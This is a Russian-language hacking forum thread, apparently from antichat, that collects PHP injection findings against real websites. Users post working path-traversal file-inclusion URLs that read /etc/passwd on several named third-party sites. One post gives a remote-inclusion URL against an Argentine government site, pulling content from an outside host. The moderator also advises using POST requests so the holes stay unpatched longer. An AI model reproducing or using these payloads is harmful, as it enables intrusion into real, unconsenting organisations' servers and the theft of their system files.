![]() |
PHP Иньекции
XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
Код:
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd |
Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.
+Постим только: +php/perl/jsp иньекции. +Исполнение произвольного кода. +Исполнение произвольных команд. +Статья php injection(http://forum.antichat.ru/thread12123.html). +За флуд буду строго наказывать. +Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html). При удаленных инклудах Постим так:Цитата:
|
Цитата:
|
Код:
http://primotechnology.com/index.php?art=../../../../../etc/passwd |
Порадовало :D
Цитата:
|
Цитата:
|
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd
|
Удаленный инклуд:
Код:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?Код:
http://www.aodaitimhue.com/nhacrock/info.php |
Цитата:
|
Цитата:
|
| Время: 22:42 |